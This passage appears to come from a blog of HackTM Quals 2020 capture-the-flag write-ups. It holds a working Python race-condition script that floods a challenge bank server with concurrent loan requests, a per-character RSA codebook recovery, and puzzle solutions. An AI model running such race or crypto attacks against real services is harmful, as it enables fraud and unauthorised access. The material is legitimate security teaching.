<span class="p">]</span> <span class="o">*</span> <span class="mi">15</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="s2">"Cookie"</span><span class="p">:</span> <span class="s2">"session="</span><span class="o">+</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s2">"User-Agent"</span><span class="p">:</span> <span class="s2">"Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"</span><span class="p">,</span> <span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span> <span class="p">}</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s1">'input'</span><span class="p">,</span> <span class="nb">dict</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s1">'csrf_token'</span><span class="p">))[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="n">params</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s1">'loan'</span><span class="p">:</span> <span class="s1">'100'</span><span class="p">,</span> <span class="s1">'csrf_token'</span><span class="p">:</span> <span class="n">token</span> <span class="p">})</span>
<span class="k">with</span> <span class="n">PoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
<span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">executor</span><span class="o">.</span><span class="n">map</span><span class="p">(</span><span class="n">get_it</span><span class="p">,</span> <span class="n">URL</span><span class="p">):</span>
<span class="k">pass</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">money</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find_all</span><span class="p">(</span><span class="s2">"li"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">money</span><span class="p">[</span><span class="mi">5</span><span class="p">])</span>
<span class="k">if</span> <span class="s2">"1,500"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">money</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Failed! Try again"</span><span class="p">)</span>
<span class="n">exit</span><span class="p">()</span>
<span class="k">pass</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s1">'input'</span><span class="p">,</span> <span class="nb">dict</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s1">'csrf_token'</span><span class="p">))[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="n">params</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s1">'item'</span><span class="p">:</span> <span class="s1">'1337'</span><span class="p">,</span> <span class="s1">'csrf_token'</span><span class="p">:</span> <span class="n">token</span> <span class="p">})</span>
<span class="nb">print</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">mydivs</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">findAll</span><span class="p">(</span><span class="s2">"div"</span><span class="p">,</span> <span class="p">{</span><span class="s2">"class"</span><span class="p">:</span> <span class="s2">"alert-success"</span><span class="p">})</span>
<span class="nb">print</span><span class="p">(</span><span class="n">mydivs</span><span class="p">)</span>
</code></pre></div>
<p>You may need to run the script a few times to get the correct amount of money.</p>
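<p>The script fires 15 identical loan requests from a thread pool and only succeeds when all of them go through, which is the signature of a loan check that is not atomic on the server side. As an added illustration (this is not the challenge's server code; its loan rule is assumed here for the demonstration), a toy handler in Python shows the racy check-then-update next to the locked version a defender would ship:</p>

```python
# Added example (not the challenge's server code): a toy loan handler showing the
# check-then-update race that many identical concurrent requests exploit, and the
# atomic version that closes it. The loan rule below is constructed for illustration.
import threading
import time

LOAN = 100
LIMIT = 100  # constructed rule: a loan is granted only while the balance is below LIMIT


class Account:
    def __init__(self):
        self.balance = 0
        self.lock = threading.Lock()

    def loan_racy(self, barrier):
        """Vulnerable: the check and the update are separate steps with a gap between
        them (in a real application that gap is a database round trip)."""
        barrier.wait()                 # make all workers reach the check together
        if self.balance < LIMIT:       # 1. check
            time.sleep(0.01)           #    window in which other workers also pass the check
            self.balance += LOAN       # 2. update
            return True
        return False

    def loan_safe(self, barrier):
        """Fixed: check and update happen as one step under a lock
        (a row lock or a conditional UPDATE in a database plays the same role)."""
        barrier.wait()
        with self.lock:
            if self.balance < LIMIT:
                time.sleep(0.01)
                self.balance += LOAN
                return True
            return False


def run_requests(safe, workers=15):
    """Fire `workers` concurrent loan requests; return (loans granted, final balance)."""
    account = Account()
    barrier = threading.Barrier(workers)
    handler = account.loan_safe if safe else account.loan_racy
    granted = []
    granted_lock = threading.Lock()

    def worker():
        ok = handler(barrier)
        with granted_lock:
            granted.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(granted), account.balance


if __name__ == "__main__":
    print("racy:", run_requests(safe=False))   # more than one loan granted
    print("safe:", run_requests(safe=True))    # (1, 100)
```

<p>The barrier only makes the demonstration reproducible; in the real challenge the same overlap is produced by the thread pool sending requests faster than the server finishes handling each one.</p>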
<div class="highlight"><pre><span></span><code>$ python bank.py <span class="s2">"COOKIE"</span>
<li>Money: <span class="m">1</span>,100.00 tBTC</li>
Failed! Try again
$ python bank.py <span class="s2">"COOKIE"</span>
<span class="o">[</span>...<span class="o">]</span> Well <span class="k">done</span>! You have just bought a HackTM<span class="o">{</span>9f19d6b8fdc9f5c6426343f5b004e6c6794d96b9be329402af463c294297550b<span class="o">}</span> with <span class="m">1337</span> tBTC.<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>HackTM Quals20 - Prison Break2020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-prison-break.html<p><em>solves : 92</em></p>
<div class="highlight"><pre><span></span><code>Prison Break
119 Points
Author: FeDEX
Your friend has been captured by some country's secret services and is being held in a prison. Having reached the prison, you realise there is a code there that you need to break.
The enemies have been kind enough to leave a large file containing 3 numbers on each line and the following message for you:
"Start with a list of 10^7 zeros and for every line containing a,b,c separated by a space in the given file, add c modulo 10 to every number in your list between indices a and b (a included only).
Indices start at 1 in the list. At the end, compute the product modulo 999999937 of the nonzero digits in your list and you will obtain the password needed to free your friend".
The problem is that your friend needs medication within the next 3 days so can you break the password soon enough?
Flag Format: HackTM{CODE}
Challenge Files: https://drive.google.com/file/d/1CNwGf_lKq8wHA8qYQJFkqP5HCybmYBel/view
</code></pre></div>
<p>We get a huge file (138 MB) with a lot of lines:</p>
<div class="highlight"><pre><span></span><code>$ wc -l Given_File.txt
<span class="m">9999999</span> Given_File.txt
</code></pre></div>
<p>Each line consists of three numbers, as described in the challenge text (a, b and c):</p>
<div class="highlight"><pre><span></span><code>183 183 0
548 3000548 5
91 8000091 5
41 2000041 8
95 1000095 1
296 296 4
625 625 2
</code></pre></div>
<p>Using that description, we can clean the file to get fewer lines and speed up the computation of the code:</p>
<div class="highlight"><pre><span></span><code>$ cat Given_File.txt <span class="p">|</span> sort -n -k <span class="m">1</span> <span class="p">|</span> uniq -c <span class="p">|</span> sed <span class="s1">'s/^[ \t]*//;s/[ \t]*$//'</span> <span class="p">|</span> grep -v <span class="s1">' 0'</span> > clean_file
</code></pre></div>
<ul>
<li>sort the lines by their first number (not by the entire line)</li>
<li>count the repeated lines and prefix each one with its number of occurrences (<code>uniq -c</code>)</li>
<li>strip the leading whitespace that <code>uniq -c</code> adds before the count</li>
<li>remove every line ending in 0, since adding 0 does nothing and no loop is needed for it</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c1"># read the cleaned file: each line is "count a b c" (count added by uniq -c)</span>
<span class="n">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"clean_file"</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span>
<span class="n">l</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">9000999</span><span class="p">):</span>
    <span class="n">l</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">file</span><span class="p">:</span>
    <span class="n">o</span><span class="p">,</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="n">c</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
    <span class="c1"># identical lines were merged by uniq -c, so add c (mod 10) count times at once</span>
    <span class="n">value</span> <span class="o">=</span> <span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span><span class="p">)</span> <span class="o">*</span> <span class="nb">int</span><span class="p">(</span><span class="n">o</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">continue</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">b</span><span class="p">)):</span>
        <span class="n">l</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+=</span> <span class="n">value</span>
<span class="c1"># keep only the nonzero last digits</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">f</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
    <span class="n">current</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span>
    <span class="k">if</span> <span class="n">current</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">f</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span><span class="p">)</span>
<span class="c1"># product of the nonzero digits modulo 999999937</span>
<span class="n">final</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span>
    <span class="k">if</span> <span class="n">a</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">continue</span>
    <span class="n">final</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">final</span><span class="p">)</span> <span class="o">%</span> <span class="mi">999999937</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Flag is : HackTM{"</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">final</span><span class="p">)</span> <span class="o">+</span> <span class="s2">"}"</span><span class="p">)</span>
</code></pre></div>
<p>Since Python is not really fast at this, I chose to use <a href="https://pypy.org/">pypy</a>. You can run your Python script with it, but pypy handles it with a different approach than the regular Python interpreter.</p>
<div class="highlight"><pre><span></span><code>$ pypy3 prison_break.py
Flag is : HackTM<span class="o">{</span><span class="m">585778044</span><span class="o">}</span>
</code></pre></div>
<p>My script took <code>948,21s user 0,69s system 99% cpu 15:50,45 total</code>. I guess I can make it better and improve the input file too.</p>
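<p>The inner loop above touches every cell between <code>a</code> and <code>b</code> for each line, which is why the run takes a quarter of an hour. As an added example (not the blog's <code>prison_break.py</code>), the same computation can be done with a difference array: each line records <code>+c</code> at index <code>a</code> and <code>-c</code> at index <code>b</code>, and one final pass over the list accumulates the running total. The <code>SAMPLE</code> input is constructed for the demonstration and is not taken from the challenge file.</p>

```python
# Added example (not the blog's prison_break.py): the same computation done with a
# difference array, so every "a b c" line costs O(1) instead of a loop over b - a cells.
# To run it on the challenge data: prison_break_code(open("Given_File.txt"), 10**7)

MOD = 999999937


def parse_line(line):
    """Return (a, b, c % 10) for a well-formed 'a b c' line, or None for anything else."""
    parts = line.split()
    if len(parts) != 3:
        return None
    a, b, c = (int(x) for x in parts)
    return a, b, c % 10


def prison_break_code(lines, size=10**7):
    """Follow the challenge text: a list of `size` zeros with 1-based indices,
    add c mod 10 to indices a .. b-1 (a included, b excluded), then multiply the
    nonzero digits (value mod 10) together modulo MOD."""
    # diff[i] is the change in the running total when reaching 1-based index i
    diff = [0] * (size + 2)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # blank or malformed line
        a, b, c = parsed
        b = min(b, size + 1)  # clamp so the range never leaves the list
        if c == 0 or a < 1 or a >= b:
            continue  # adding 0 (or an empty range) changes nothing
        diff[a] += c
        diff[b] -= c
    product, running = 1, 0
    for i in range(1, size + 1):
        running += diff[i]
        digit = running % 10
        if digit:
            product = product * digit % MOD
    return product


def prison_break_naive(lines, size):
    """Direct translation of the challenge text; only used to cross-check the fast version."""
    values = [0] * (size + 1)  # index 0 unused so indices are 1-based
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        a, b, c = parsed
        for i in range(max(a, 1), min(b, size + 1)):
            values[i] += c
    product = 1
    for v in values[1:]:
        if v % 10:
            product = product * (v % 10) % MOD
    return product


# Constructed sample (not from the challenge file), small enough to check by hand:
# index 1 gets 3, indices 2 and 3 get 3+8=11, indices 4 and 5 get 8, the rest stay 0.
SAMPLE = """1 4 3
2 6 8
3 3 5
5 8 10
"""


def cross_check(seed=1, trials=20, size=50, updates=30):
    """Compare both implementations on seeded random inputs; True if they always agree."""
    import random
    rng = random.Random(seed)
    for _ in range(trials):
        lines = ["%d %d %d" % (rng.randint(1, size), rng.randint(1, size), rng.randint(0, 99))
                 for _ in range(updates)]
        if prison_break_code(lines, size) != prison_break_naive(lines, size):
            return False
    return True


if __name__ == "__main__":
    print(prison_break_code(SAMPLE.splitlines(), 8))  # 3*1*1*8*8 = 192
```

<p>With the difference array the cost is one pass over the 10 million lines plus one pass over the 10 million cells, so the <code>sort | uniq -c</code> preprocessing is no longer needed either.</p>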
<p>PS : I tried to compile my python script to C code with <a href="https://cython.org/">cython</a> but I can't get a working binary :(.</p>HackTM Quals20 - Romanian Gibberish2020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-romanian-gibberish.html<p><em>solves : 711</em></p>
<div class="highlight"><pre><span></span><code>Romanian Gibberish
25 Points
https://en.wikipedia.org/wiki/Gibberish_(language_game)
HapackTM{Wepelcopomepe_Topo_HAPACKTMCTF_2020!}
</code></pre></div>
<div class="highlight"><pre><span></span><code>Gibberish (sometimes Jibberish) is a language game that is played in the United States and Canada. Similar games are played in many other countries. The name Gibberish refers to the nonsensical sound of words spoken according to the rules of this game.
</code></pre></div>
<p>So we need to remove the nonsensical syllables from the given flag. We know that all flags start with <code>HackTM{</code>, so we need to remove every <code>p</code> (or <code>P</code>) together with the character that follows it.</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"HapackTM{Wepelcopomepe_Topo_HAPACKTMCTF_2020!}"</span> <span class="p">|</span> sed <span class="s1">'s/[pP].//g'</span>
HackTM<span class="o">{</span>Welcome_To_HACKTMCTF_2020!<span class="o">}</span>
</code></pre></div>HackTM Quals20 - RSA is easy #12020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-rsa-is-easy-1.html<p><em>solves : 279</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #1
50 Points
Author: stackola
challenge_files.zip a6ba5325c1a34910db0f4e8cce82f5bd
</code></pre></div>
<p>We got two files in the zip:</p>
<div class="highlight"><pre><span></span><code>$ zipinfo challenge_files.zip
Archive: challenge_files.zip
Zip file size: <span class="m">5533</span> bytes, number of entries: <span class="m">3</span>
drwxr-xr-x <span class="m">3</span>.0 unx <span class="m">0</span> bx stor <span class="m">20</span>-Jan-15 <span class="m">17</span>:07 challenge_files/
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">11802</span> tx defN <span class="m">20</span>-Jan-15 <span class="m">16</span>:47 challenge_files/c
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">891</span> tx defN <span class="m">20</span>-Jan-15 <span class="m">17</span>:04 challenge_files/rsa.py
<span class="m">3</span> files, <span class="m">12693</span> bytes uncompressed, <span class="m">5017</span> bytes compressed: <span class="m">60</span>.5%
</code></pre></div>
<p>The Python script shows us how the other file <code>c</code> was created, along with the RSA implementation:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>
<span class="kn">from</span> <span class="nn">my_math</span> <span class="kn">import</span> <span class="n">next_prime</span>
<span class="kn">from</span> <span class="nn">flag</span> <span class="kn">import</span> <span class="n">flag</span>
<span class="k">def</span> <span class="nf">egcd</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span>
    <span class="k">while</span> <span class="n">a</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">q</span><span class="p">,</span> <span class="n">r</span> <span class="o">=</span> <span class="n">b</span><span class="o">//</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">%</span> <span class="n">a</span>
        <span class="n">m</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">x</span><span class="o">-</span><span class="n">u</span><span class="o">*</span><span class="n">q</span><span class="p">,</span> <span class="n">y</span><span class="o">-</span><span class="n">v</span><span class="o">*</span><span class="n">q</span>
        <span class="n">b</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span> <span class="o">=</span> <span class="n">a</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span><span class="p">,</span> <span class="n">m</span><span class="p">,</span> <span class="n">n</span>
    <span class="n">gcd</span> <span class="o">=</span> <span class="n">b</span>
    <span class="k">return</span> <span class="n">gcd</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span>
<span class="k">def</span> <span class="nf">gen_keys</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">):</span>
    <span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
    <span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
    <span class="n">phi</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
    <span class="n">gcd</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">b</span> <span class="o">=</span> <span class="n">egcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi</span><span class="p">)</span>
    <span class="c1"># Keys:((pub), (priv))</span>
    <span class="k">return</span> <span class="p">((</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">),</span> <span class="p">(</span><span class="n">d</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">enc</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="n">e</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">key</span>
    <span class="n">cipher</span> <span class="o">=</span> <span class="p">[</span><span class="nb">pow</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">),</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">p</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">cipher</span>
<span class="k">def</span> <span class="nf">dec</span><span class="p">(</span><span class="n">pk</span><span class="p">,</span> <span class="n">c</span><span class="p">):</span>
    <span class="n">key</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">pk</span>
    <span class="n">plain</span> <span class="o">=</span> <span class="p">[</span><span class="nb">chr</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">c</span><span class="p">]</span>
    <span class="k">return</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">plain</span><span class="p">)</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">next_prime</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">SystemRandom</span><span class="p">()</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">512</span><span class="p">))</span>
<span class="n">q</span> <span class="o">=</span> <span class="n">next_prime</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">SystemRandom</span><span class="p">()</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">512</span><span class="p">))</span>
<span class="n">flag_key</span><span class="o">=</span><span class="n">gen_keys</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Public key:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag_key</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">flag_c</span><span class="o">=</span><span class="p">(</span><span class="n">enc</span><span class="p">(</span><span class="n">flag_key</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">flag</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Encrypted flag:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag_c</span><span class="p">)</span>
</code></pre></div>
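<p>The weakness is in <code>enc</code>: every character is raised to <code>e</code> modulo <code>n</code> on its own, with no padding, so the same letter always gives the same number and there are only as many possible ciphertexts as there are characters. As an added example (not the challenge's <code>rsa.py</code>, and using a small constructed key rather than the real one), the following shows that anyone holding the public key can rebuild a character-to-ciphertext table and read such a message without ever knowing <code>d</code>:</p>

```python
# Added example, not the challenge's rsa.py: why encrypting one character at a time with
# unpadded ("textbook") RSA is breakable using nothing but the public key.
import string

# Constructed toy key (two small primes), NOT the challenge's real key.
P, Q = 10007, 10009
E = 65537
N = P * Q


def enc_per_char(key, plaintext):
    """Same scheme as the challenge's enc(): each character is raised to e modulo n on its
    own, with no padding, so the same character always produces the same ciphertext."""
    e, n = key
    return [pow(ord(ch), e, n) for ch in plaintext]


def build_codebook(key, alphabet=string.printable):
    """Map ciphertext -> character for every candidate character. RSA is deterministic,
    so the public operation run over the whole alphabet reproduces every possible value."""
    e, n = key
    return {pow(ord(ch), e, n): ch for ch in alphabet}


def recover(key, cipher, alphabet=string.printable):
    """Read a per-character ciphertext list without the private key."""
    codebook = build_codebook(key, alphabet)
    return "".join(codebook.get(c, "?") for c in cipher)


def codebook_is_injective(key, alphabet=string.printable):
    """True if no two characters share a ciphertext (RSA is a permutation, so always True)."""
    return len(build_codebook(key, alphabet)) == len(alphabet)


def demo():
    plaintext = "HackTM{constructed_example}"  # constructed placeholder, not the real flag
    cipher = enc_per_char((E, N), plaintext)
    return recover((E, N), cipher)


if __name__ == "__main__":
    print(demo())
```

<p>The size of <code>n</code> is irrelevant here: the table has one entry per candidate character whatever the key length, which is why the same recovery works against the 1024-bit modulus in <code>c</code>. A proper construction encrypts the whole message as one padded block (OAEP), so repeated plaintexts no longer produce repeated ciphertexts.</p>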
<p>So the <code>c</code> file contains the public key, that is the exponent <code>e</code> and the modulus <code>n</code> = <code>p</code> times <code>q</code>, followed by the encrypted flag:</p>
<div class="highlight"><pre><span></span><code>Public key:
(65537, 28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873)
Encrypted flag:
[24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 15645290594995180815865397749136800126080704684884296404807344870555186823350216705796063922278419585484662234210001661578549560411864952462380096494781766394542247609648743673312823946783517115542404474786395934886667795692210287283039316418126796934535150832709500306153601987121172178183970841498331059732, 24345863558959407738249127568820138362115734211146549194534219311913032290216606859385934708675962835857804566049600710875035366973110422262131331932310524891713319358676673958738776644229757625523955354996402750265022578843637525183704187498194489645838490640529841182709661371499013082259193633000753627261, 9620679224297488175028367924764722982789333194446063577221477359704180638294602848741035585656113543497776415635770748468725814916994577398023154224563920936523717884116880223345204061598438291740007518025998041449406726084042681798053863495542392481059281588020105313791046017356493739244555377217866496734, 1681724029430984846089508679185107538104072555994133932050319175633667369916570440070548756805254789524599169177371471218251246349461689959989338169394649813424706418737543924129213419625988100326558802566046751879531469160120914735332858786199496335523515150741728027296830843112416558460932541777024522279, 
20629854768856798537062426042570334097651328955665698429979954410631113160492201197690192324881508105172595216229624523572595589920695165876501026993810936392510720968159305964832449680889041278532807173859579419197780294984519222830572413180237776797800176462492384318120546495539728732366110782215071262307, 7440918084186181327822271261394344901791253526257166181264874776746516620936925799031445704193589071453959493392065321806281801023425299535553522582376879027448581379760896052013060957519595664095702210758316558762834545655992756483227787274192094065257224706388623944855362716578806372564148647945479173348, 5097867843777034076271397095201528351784693372027998615436445410912131141882225577577253530396333413579756394884096318434100382509189974240357351425474190558456256750742731090012822064840481143528081027106843123030275420215136304130321013605031261372665636366377162666476737296028608455229357416005773064242, 10420107412794383499391199999666100864853724770814620968725971207705900061273163202891569477729023724554388008575891113425781557296798472693974759813058067631655217722786373465395279381307973425004404348124524059844749313287030234750535347511172780349725636807760402334957881556461382950021814486095167001394, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 
